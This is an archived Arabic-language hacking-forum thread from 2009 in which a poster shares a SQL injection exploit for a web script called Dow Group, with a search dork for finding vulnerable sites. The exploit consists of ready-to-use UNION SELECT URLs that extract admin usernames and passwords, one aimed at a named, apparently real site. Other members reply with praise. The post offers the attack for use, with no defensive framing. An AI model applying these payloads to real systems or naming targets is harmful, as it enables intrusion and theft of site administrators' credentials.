:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   ثـغرات العـناكب ~ (http://www.vbspiders.com/vb/f136.html)
-   -   Dow Group (id) Remote SQL Injection Vulnerability (http://www.vbspiders.com/vb/t4854.html)

GoLdeN-z3r0 02-19-2009 09:12 PM

Dow Group (id) Remote SQL Injection Vulnerability
 
كود PHP:

#####################################################################################################

##                                                           

بْسـْ ـّم الله الرحمّن الرحيــِّْـْـِـْمّ #



###################################################################################################

[#] DorK :  Powered by Dow Group 

[~] Found by GoLdeN-z3r0      m-taqi                                           

[~] My h0m3 b4g3 WwW.GoLd3n-Bl0g.Com   wWw.vBSpiders.CoM                             

[~] Name Script Dow Group

#############################[ I love the Messenger of Allah Mohammad ]#############################

[~] Exploit 

http://xxx.com/register.php?id=-425+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11+from+crc_crcdubai.admin/*

[#] ExploiT ,~[2]~

http://XXX.com/register.php?id=-425+union+select+1,concat_ws(0x3a,User_Name,Password),3,4,5,6,7,8,9,10,11+from+crc_arabic.admin/*

[~] Example :

http://crcdubai.com/register.php?id=-425+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11+from+crc_crcdubai.admin/*

#############################[ I love the Messenger of Allah Mohammad ]#############################

[~] Greetz :

nO Fri3nd5

####################################################################################################

GoLdeN-z3r0 M-TaQi Sm4rT Security Cr3w wWw.AraB-HaC.CoM

#################################################################################################### 

# ] 


●๋•ஜ ⋋MATRX H@!L⋌ ஜ●๋• 02-20-2009 01:12 AM

وربي وحــــــــــــــــــــش

الى المــإمـــ

قناص الشبكه 02-20-2009 04:11 PM

يسلمو اخي على الثغره عاش يا وحش

قاهر الويب 02-21-2009 09:51 PM

يعطيك العافيه يا بـطل بطل

Sho0Ter 03-23-2009 10:23 PM

تمام اخى ديما فى تقدم

S!l3nT_Sm!l3 01-03-2013 06:01 AM

رد: Dow Group (id) Remote SQL Injection Vulnerability
 
مشكوووووووووور


الساعة الآن 10:45 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0